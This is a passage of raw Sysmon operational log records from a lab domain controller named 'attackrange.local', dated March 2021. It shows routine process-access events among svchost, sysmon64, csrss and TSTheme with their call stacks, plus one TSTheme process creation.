\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.905{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
